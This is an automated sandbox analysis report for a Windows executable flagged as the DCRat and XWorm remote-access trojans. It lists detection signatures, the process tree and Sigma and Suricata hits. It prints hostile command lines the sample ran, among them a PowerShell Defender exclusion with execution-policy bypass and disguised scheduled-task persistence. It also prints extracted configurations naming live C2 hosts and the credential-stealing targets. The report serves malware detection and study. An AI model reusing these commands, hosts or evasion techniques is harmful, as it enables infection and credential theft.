Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
cougif6lqM.exe

Overview

General Information

Sample name:cougif6lqM.exe
renamed because original name is a hash value
Original sample name:2bbc8212c548dcb848224a882b32492a.exe
Analysis ID:1488678
MD5:2bbc8212c548dcb848224a882b32492a
SHA1:d056d925ed8284c3b41e4bd2905e6e4cbbd56d3b
SHA256:4b0446befa42f4a40fd06635aaa72fb34dfbaa7575fb1f811df6f4fad90f53b4
Tags:DCRatexe
Infos:

Detection

DCRat, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Drops PE files to the user root directory
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cougif6lqM.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\cougif6lqM.exe" MD5: 2BBC8212C548DCB848224A882B32492A)
    • javaclient.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\javaclient.exe" MD5: 2F969595E0DD360ECD52126BF5ECE5E5)
      • schtasks.exe (PID: 8108 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 8132 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 8188 cmdline: schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6316 cmdline: schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7156 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6972 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 4780 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Mail\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 3820 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6932 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtL" /sc ONLOGON /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7452 cmdline: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 8 /tr "'C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7520 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7504 cmdline: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7636 cmdline: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • powershell.exe (PID: 2128 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DCRatBuild.exe (PID: 7412 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 81A0B6CE5163BE692566FFA70F8E9839)
      • wscript.exe (PID: 7460 cmdline: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
        • cmd.exe (PID: 7508 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • providerreviewdhcp.exe (PID: 7552 cmdline: "C:\Componenthost\providerreviewdhcp.exe" MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
            • cmd.exe (PID: 8040 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7200 cmdline: C:\Users\user\cmd.exe MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • cmd.exe (PID: 1688 cmdline: C:\Users\user\cmd.exe MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • Memory Compression.exe (PID: 7908 cmdline: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe" MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • Memory Compression.exe (PID: 7984 cmdline: "C:\Program Files (x86)\windows defender\en-GB\Memory Compression.exe" MD5: 8F04E3EE4A119F4B39412E27CED12DE8)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["light-liable.gl.at.ply.gg"], "Port": "10314", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: DCRat

{"SCRT": "{\"H\":\";\",\"y\":\"$\",\"J\":\"^\",\"5\":\"&\",\"B\":\"_\",\"L\":\">\",\"I\":\"#\",\"a\":\"(\",\"U\":\".\",\"C\":\"`\",\"d\":\"!\",\"6\":\")\",\"x\":\"-\",\"c\":\"*\",\"4\":\",\",\"o\":\" \",\"S\":\"@\",\"0\":\"<\",\"h\":\"%\",\"M\":\"~\",\"z\":\"|\"}", "PCRT": "{\"v\":\";\",\"Q\":\"<\",\"6\":\"%\",\"B\":\"#\",\"R\":\"*\",\"U\":\"$\",\"Z\":\"(\",\"V\":\"~\",\"L\":\".\",\"3\":\">\",\"F\":\"|\",\"x\":\"-\",\"s\":\"@\",\"0\":\",\",\"J\":\")\",\"h\":\"!\",\"p\":\"`\",\"k\":\"_\",\"I\":\" \",\"T\":\"&\",\"H\":\"^\"}", "TAG": "", "MUTEX": "DCR_MUTEX-CW0MLhmPnzDpkkOuZEHa", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "H2": "http://a1013249.xsph.ru/@=UGO0gTOkVjZ", "T": "0"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\javaclient.exeJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\javaclient.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xcb4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xcbe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xccfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xc867:$cnc4: POST / HTTP/1.1

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000002.00000000.1327658991.0000000000EC2000.00000002.00000001.01000000.00000006.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0xc94b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0xc9e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0xcafd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0xc667:$cnc4: POST / HTTP/1.1
      00000028.00000002.1513471393.0000000002D91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        0000002A.00000002.1517396761.0000000003371000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000020.00000002.1513885055.0000000003111000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.0.javaclient.exe.ec0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
              2.0.javaclient.exe.ec0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0xcb4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0xcbe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0xccfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0xc867:$cnc4: POST / HTTP/1.1

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Execution from Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, CommandLine: C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, CommandLine|base64offset|contains: , Image: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, NewProcessName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, OriginalFileName: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1124, ProcessCommandLine: C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe, ProcessId: 7628, ProcessName: hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Sigma detected: Files With System Process Name In Unsuspected Locations
              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Componenthost\providerreviewdhcp.exe, ProcessId: 7552, TargetFilename: C:\Recovery\csrss.exe
              Sigma detected: New RUN Key Pointing to Suspicious Folder
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\JavaClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\javaclient.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JavaClient
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\JavaClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\javaclient.exe, ProcessId: 7396, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\JavaClient
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\javaclient.exe, ProcessId: 7396, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnk
              Sigma detected: Suspicious Add Scheduled Task Parent
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, ProcessId: 8108, ProcessName: schtasks.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 7412, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" , ProcessId: 7460, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\javaclient.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\javaclient.exe, ParentProcessId: 7396, ParentProcessName: javaclient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe', ProcessId: 2128, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Sigma detected: Schedule system process
              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f, CommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f, ParentImage: C:\Windows\System32\schtasks.exe, ParentProcessId: 8108, ParentProcessName: schtasks.exe, ProcessCommandLine: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe'" /f, ProcessId: 7520, ProcessName: schtasks.exe

              Suricata Signatures

              Timestamp:2024-08-06T11:52:51.212378+0200
              SID:2855924
              Source Port:49716
              Destination Port:10314
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-06T11:54:05.009491+0200
              SID:2853193
              Source Port:49720
              Destination Port:10314
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-06T11:54:31.399989+0200
              SID:2853193
              Source Port:49721
              Destination Port:10314
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-08-06T11:52:15.171137+0200
              SID:2034194
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: cougif6lqM.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://a1013249.xsph.ru/@=UGO0gTOkVjZAvira URL Cloud: Label: malware
              Antivirus detection for dropped file
              Source: C:\Componenthost\providerreviewdhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAvira: detection malicious, Label: VBS/Runner.VPG
              Source: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
              Source: C:\Componenthost\aZjsojBpBtPKe.vbeAvira: detection malicious, Label: VBS/Runner.VPG
